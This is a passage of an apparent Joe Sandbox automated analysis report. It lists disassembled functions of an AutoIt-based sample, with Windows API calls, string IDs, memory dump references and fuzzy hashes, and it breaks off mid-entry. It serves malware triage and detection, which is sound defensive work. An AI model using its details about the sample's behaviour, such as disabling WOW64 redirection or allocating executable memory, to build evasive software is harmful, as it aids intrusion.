                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00447B61
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00447B76
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: '$`$
                            • API String ID: 3850602802-3373939379
                            • Opcode ID: 971cd5ea662a8e41131ddf95506b44132e22e5e76a027ed8605d5968e8b5bb6c
                            • Instruction ID: 537ed56c20d7df91e55e195b3c5f6823b67bad3e879c8038bee1d3e6cbb28c60
                            • Opcode Fuzzy Hash: 971cd5ea662a8e41131ddf95506b44132e22e5e76a027ed8605d5968e8b5bb6c
                            • Instruction Fuzzy Hash: 7D411874A0520A9FEB14CF65C981BEEBBB9FF08304F10456AE904EB391D774A952CF94
                            Function 004473D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00447461
                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00447475
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00447499
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: SysMonthCal32
                            • API String ID: 2326795674-1439706946
                            • Opcode ID: 96ddcdfd958ff2d0127de81c72a1abea74c940e024543b50b05dbcf74e3144a2
                            • Instruction ID: 771f56a82ae0832a220daace8c334bc86898dcf9aecc64f8d26ec5a1bc697533
                            • Opcode Fuzzy Hash: 96ddcdfd958ff2d0127de81c72a1abea74c940e024543b50b05dbcf74e3144a2
                            • Instruction Fuzzy Hash: 2A219F32600218BBEF11CF64CC46FEB3B69EB48724F110215FE156B190DBB9AC95DBA4
                            Function 00446CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00446D3B
                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00446D4B
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00446D70
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$MoveWindow
                            • String ID: Listbox
                            • API String ID: 3315199576-2633736733
                            • Opcode ID: 9fd35a218171dec5079f8d393a69e242cddb22e3b901336c1e9ba5e7ba5c7163
                            • Instruction ID: a0d0df4fc7f99fd3599ccb6054d02e94ac5b05fae1e79e78157f4dcacaacac8c
                            • Opcode Fuzzy Hash: 9fd35a218171dec5079f8d393a69e242cddb22e3b901336c1e9ba5e7ba5c7163
                            • Instruction Fuzzy Hash: 74210472600118BFEF118F54CC84FBB3BBAEF8A750F028139F9459B2A0C6759C5187A4
                            Function 004339E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            • __snwprintf.LIBCMT ref: 00433A66
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __snwprintf_memmove
                            • String ID: , $$AUTOITCALLVARIABLE%d$%E
                            • API String ID: 3506404897-3592505783
                            • Opcode ID: 1b4be70c932c36cc7590e1d32e8f30e5c9722b085b5b1b76355ec625320d8a0c
                            • Instruction ID: 40835c4567674ae95eabcb8aff72201029838cd949bfcc6c065adec6d53725b9
                            • Opcode Fuzzy Hash: 1b4be70c932c36cc7590e1d32e8f30e5c9722b085b5b1b76355ec625320d8a0c
                            • Instruction Fuzzy Hash: 38218C31600219AACF11EF64CC86FAE77A5AF48711F50445AE849AB281DB38EA45CB69
                            Function 0044770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00447772
                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00447787
                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00447794
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: msctls_trackbar32
                            • API String ID: 3850602802-1010561917
                            • Opcode ID: 4705a3a2113510e1c79b7d326143f1f6d92874b0d433e83bb34f95e958962e47
                            • Instruction ID: b1ff21ddeef1f1578128bb3457410ab64e494e375f732974c70aab8865033909
                            • Opcode Fuzzy Hash: 4705a3a2113510e1c79b7d326143f1f6d92874b0d433e83bb34f95e958962e47
                            • Instruction Fuzzy Hash: C4112372240208BAFF205F61CC45FEB77A8EF89B64F11412DFA45A6191C772E812CB24
                            Function 003E6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID: G$@BH
                            • API String ID: 3494438863-1093684215
                            • Opcode ID: 0a816a383adc27f6646b16392de779ce5b71dd050d5a1cfc0536d118dc77df8b
                            • Instruction ID: a6806ce044666a64e8d3a170666c4f3bbcd1dacf8cfe7e62309eb1a695bf7a3a
                            • Opcode Fuzzy Hash: 0a816a383adc27f6646b16392de779ce5b71dd050d5a1cfc0536d118dc77df8b
                            • Instruction Fuzzy Hash: 5BF0C8756046738BF7258F67BC52B9A2794E714374B104A6EE104CE1C0EF3088404BC8
                            Function 0044ACCF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 0044ACD1
                            • GetFocus.USER32(?,00000000,00000000,?,?,?,003FB969,?,?,?,?,?), ref: 0044ACD9
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • SendMessageW.USER32(00E35190,000000B0,000001BC,000001C0), ref: 0044AD4B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Long$FocusForegroundMessageSend
                            • String ID: `$
                            • API String ID: 3601265619-74666722
                            • Opcode ID: 9a5238993fd985390e35e739981843bdca9baabe130e23af1efb7b4cbebcfec4
                            • Instruction ID: dd2f959e8e6cd390a596c649e4f03713e506bf4b2d5b13529ca3fcb9147b6e23
                            • Opcode Fuzzy Hash: 9a5238993fd985390e35e739981843bdca9baabe130e23af1efb7b4cbebcfec4
                            • Instruction Fuzzy Hash: 8A01D2346015008FD710AF28D888A6737E6FB8A324F18067EF4158B3B0CB35AC16CB54
                            Function 003E9B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            • __lock.LIBCMT ref: 003E9B94
                              • Part of subcall function 003E9C0B: __mtinitlocknum.LIBCMT ref: 003E9C1D
                              • Part of subcall function 003E9C0B: EnterCriticalSection.KERNEL32(00000000,?,003E9A7C,0000000D), ref: 003E9C36
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 003E9BA4
                              • Part of subcall function 003E9100: ___addlocaleref.LIBCMT ref: 003E911C
                              • Part of subcall function 003E9100: ___removelocaleref.LIBCMT ref: 003E9127
                              • Part of subcall function 003E9100: ___freetlocinfo.LIBCMT ref: 003E913B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                            • String ID: 8G$8G
                            • API String ID: 547918592-2430898790
                            • Opcode ID: ee62d82da6b57ce96bad4f86ff71a3af5241c4c4f202d32e3e716a89fe7ff01b
                            • Instruction ID: 626960581b48fe01139430c1f74e41e0873516a061db8e29a038c28b469d11e1
                            • Opcode Fuzzy Hash: ee62d82da6b57ce96bad4f86ff71a3af5241c4c4f202d32e3e716a89fe7ff01b
                            • Instruction Fuzzy Hash: 65E04671942361AAEA12FBA7AD03B882B50DB44B21F2083ABF04D590C28A782440861B
                            Function 003C4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 003C4C44
                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003C4C56
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-1355242751
                            • Opcode ID: 6ee9c9293318e3279478365396d5852bf098b0a4d5c64fbd1a5282d95fe2360e
                            • Instruction ID: 6573de9e970c409421c762c50650efffd0ed2a60283600081bd076a6463218c9
                            • Opcode Fuzzy Hash: 6ee9c9293318e3279478365396d5852bf098b0a4d5c64fbd1a5282d95fe2360e
                            • Instruction Fuzzy Hash: 77D01774910723EFD720AF31D918B4A76E4AF06391B22C83E9496DA578E6B4DC84CB54
                            Function 003C4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 003C4C11
                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4C23
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                            • API String ID: 2574300362-3689287502
                            • Opcode ID: 316ad1407ba6a332162f02d950c965ac423ce5ee882b16bbe3ee9a72ef4980d0
                            • Instruction ID: 222ad39dc1cf57403219deb6871834b0195198d6f56d168aaa42a3ecebad1b04
                            • Opcode Fuzzy Hash: 316ad1407ba6a332162f02d950c965ac423ce5ee882b16bbe3ee9a72ef4980d0
                            • Instruction Fuzzy Hash: 47D08C70500712DFD7205F70D908B06B6D5EF0A342B11C83E9485C6160E6B4E880C714
                            Function 00440DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00440DF5
                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00440E07
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: RegDeleteKeyExW$advapi32.dll
                            • API String ID: 2574300362-4033151799
                            • Opcode ID: cb6e6b1bd61b6ea7dfc2b15d044bb1c156e2c7f07ff6516d1c4fbce018574beb
                            • Instruction ID: 527d594ceb6efab560b197cbe4f687d77e305661566da0a44bd49fd0ef76c2b7
                            • Opcode Fuzzy Hash: cb6e6b1bd61b6ea7dfc2b15d044bb1c156e2c7f07ff6516d1c4fbce018574beb
                            • Instruction Fuzzy Hash: 4AD0E275910722DFE7209B75C80868776E5AF05352F21CC3E958AD6650E6B8D8A0CA58
                            Function 004390E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004390EE
                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,0044F910), ref: 00439100
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetModuleHandleExW$kernel32.dll
                            • API String ID: 2574300362-199464113
                            • Opcode ID: d3b74d341e2661cf3990cc04b921a30f7aa0a0408fc3ac0d73574c6f2b54bddb
                            • Instruction ID: 4bcf639d9971f3b8989f5084a7fa3fd957c5c9952c44e1aefa379acdd8ba7c77
                            • Opcode Fuzzy Hash: d3b74d341e2661cf3990cc04b921a30f7aa0a0408fc3ac0d73574c6f2b54bddb
                            • Instruction Fuzzy Hash: FFD01274550723DFEB209F31D81C64776D4AF06351F11C83FD485D6650E6B8DC84C654
                            Function 00401714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LocalTime__swprintf
                            • String ID: %.3d$WIN_XPe
                            • API String ID: 2070861257-2409531811
                            • Opcode ID: 7ff6a9e44e5c4948280db34a74f53d8d3eeab63ed5b84f8cfbfcfe5e267a2b5f
                            • Instruction ID: b8122e9274b6d4c056e9b755b414b74f19333e3f557c0b2e1045f1e2b1216885
                            • Opcode Fuzzy Hash: 7ff6a9e44e5c4948280db34a74f53d8d3eeab63ed5b84f8cfbfcfe5e267a2b5f
                            • Instruction Fuzzy Hash: 7BD01271844118FBC70197909888DF9737CA709311F541573F406F30D0E2399B55D62A
                            Function 0041717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48668033fe87e0c3a018ffada3cba4766717c1723e1ea657dcc78c32eae746c2
                            • Instruction ID: c03e39c61cc8f6cb111f8968e603d44bb8a0e6f815384ab8fabcc343413a06c7
                            • Opcode Fuzzy Hash: 48668033fe87e0c3a018ffada3cba4766717c1723e1ea657dcc78c32eae746c2
                            • Instruction Fuzzy Hash: 4BC16C74A0421AEFCB14CFA4C884EAEBBB5FF48714B14859AE805EB351D734ED81DB94
                            Function 0043E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 0043E0BE
                            • CharLowerBuffW.USER32(?,?), ref: 0043E101
                              • Part of subcall function 0043D7A5: CharLowerBuffW.USER32(?,?), ref: 0043D7C5
                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0043E301
                            • _memmove.LIBCMT ref: 0043E314
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharLower$AllocVirtual_memmove
                            • String ID:
                            • API String ID: 3659485706-0
                            • Opcode ID: 2e4dbf7b4070cfb2c2437c4275dfd1d17840d325595e80aa45ce1f10b1af6275
                            • Instruction ID: 7b3c2090e0984fb5949d20e1eb5eb51a0c7f1fc305dd61af8e5253d78fa908bd
                            • Opcode Fuzzy Hash: 2e4dbf7b4070cfb2c2437c4275dfd1d17840d325595e80aa45ce1f10b1af6275
                            • Instruction Fuzzy Hash: 86C15371A083018FC705DF29C480A6ABBE4FF89714F14896EF899DB391D734E946CB86
                            Function 00438093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004380C3
                            • CoUninitialize.OLE32 ref: 004380CE
                              • Part of subcall function 0041D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0041D5D4
                            • VariantInit.OLEAUT32(?), ref: 004380D9
                            • VariantClear.OLEAUT32(?), ref: 004383AA
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                            • String ID:
                            • API String ID: 780911581-0
                            • Opcode ID: 12232065eb3b8d406d80f08f4e0764099374f9d6d0e42b8d34e0898af68887c9
                            • Instruction ID: 76ea3519c6bd98f976cad16abadd5d0190b630aefa54a601b8fcd81aa9ba3d01
                            • Opcode Fuzzy Hash: 12232065eb3b8d406d80f08f4e0764099374f9d6d0e42b8d34e0898af68887c9
                            • Instruction Fuzzy Hash: 38A132756047019FCB00DF25C885B2AB7E4BF89764F05445EF99A9B3A1CB38ED05CB8A
                            Function 0041687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$AllocClearCopyInitString
                            • String ID:
                            • API String ID: 2808897238-0
                            • Opcode ID: 844909aeeec2b79684a51329365b59b344c63a88b4ac652bd26ba42ffef39588
                            • Instruction ID: 45e7adfe4cbb3b12d15c3e45611c2a7741ffb3bea392ac15c4d3c191f6bb7a2b
                            • Opcode Fuzzy Hash: 844909aeeec2b79684a51329365b59b344c63a88b4ac652bd26ba42ffef39588
                            • Instruction Fuzzy Hash: C651F4747003029BCB24AF65D891BBAB7E5AF46350F21C81FE58ADB291DB78DCC18709
                            Function 00419A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00419AD2
                            • __itow.LIBCMT ref: 00419B03
                              • Part of subcall function 00419D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00419DBE
                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00419B6C
                            • __itow.LIBCMT ref: 00419BC3
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
